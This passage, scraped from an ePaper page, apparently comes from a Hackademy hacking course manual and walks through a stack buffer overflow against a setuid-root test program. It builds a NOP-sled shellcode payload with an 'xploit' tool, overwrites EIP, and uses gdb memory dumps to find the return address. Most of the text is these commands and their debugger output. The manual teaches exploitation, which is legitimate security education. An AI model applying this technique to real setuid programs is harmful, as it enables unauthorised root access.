Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
All we have to do now is inject a string containing the shellcode to execute and to overwrite the EIP<br />
through the address found previously:<br />
[NOP]...[NOP][SHELLCODE][0xbffffb10]<br />
We are going to see how to operate the vuln1.c program whose bit suid root will have been activated:<br />
$chown root.root vuln1<br />
$chmod 4755 vuln1<br />
Let us use xploit.c to generate the chain (destined to operate the program) into an environment<br />
variable, that you will give as an argument to the vulnerable suid root. We will use it twice in a row, first<br />
to inject the character chain containing the shellcode in order to determine the buffer address with the<br />
gdb, then to inject the same string by overwriting the EIP through the address found.<br />
First, we overwrite EIP with an address by default.<br />
$./xploit -b 600 -E RET<br />
We are going to look for an address pointing to the NOP preceding the shellcode with the help <strong>of</strong> gdb.<br />
xdream@Laptop:/tmp$ gdb vuln1<br />
(gdb) r $RET<br />
Starting program: /tmp/vuln1 $RET<br />
(no debugging symbols found)...(no debugging symbols found)...<br />
<strong>Pro</strong>gram received signal SIGSEGV, Segmentation fault.<br />
0xbffffade in ?? ()<br />
We have redirected the program execution towards the address by default that does not contain the<br />
shellcode.<br />
Let us dump the memory from the address pointed by ESP (the top <strong>of</strong> the pile), while we are looking<br />
for the injected chain:<br />
(gdb) x/500x $esp<br />
0xbffff6c3: 0xfaafb8bf 0xf6cdbfff 0xcff8bfff 0x00004014<br />
0xbffff6d3: 0xfffab800 0xfffab8bf 0xfffab8bf 0xfffab8bf<br />
...<br />
0xbffff843: 0x00000000 0x36383669 0x6d742f00 0x75762f70<br />
0xbffff853: 0x00316e6c 0x90909090 0x90909090 0x90909090<br />
0xbffff863: 0x90909090 0x90909090 0x90909090 0x90909090<br />
0xbffff873: 0x90909090 0x90909090 0x90909090 0x90909090<br />
0xbffff883: 0x90909090 0x90909090 0x90909090 0x90909090<br />
The <strong>Hack</strong>ademy DMP -146/209- SYSDREAM